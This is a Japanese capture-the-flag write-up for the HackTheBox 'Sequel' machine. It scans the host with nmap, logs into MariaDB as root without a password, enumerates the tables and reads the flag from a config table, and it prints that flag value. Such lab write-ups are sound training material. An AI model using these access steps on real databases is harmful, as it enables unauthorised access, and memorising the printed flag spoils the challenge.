概要
HackTheBox:Sequelのflagを入手する手順を記す。
Port Scan
$ nmap -F -Pn -v sequel.htb --min-rate=5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 11:07 EDT
Initiating Connect Scan at 11:07
Scanning sequel.htb (10.129.193.163) [100 ports]
Discovered open port 3306/tcp on 10.129.193.163
Completed Connect Scan at 11:07, 0.93s elapsed (100 total ports)
Nmap scan report for sequel.htb (10.129.193.163)
Host is up (0.29s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
MySQLが提供されていることが分かる。
MySQL
rootユーザーでログインを試してみる。
$ mysql -u root -h sequel.htb
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
無事ログインできたので、探索を行う
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.248 sec)
MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.247 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.247 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.248 sec)
configテーブル内にflagを見つけることができた。
以上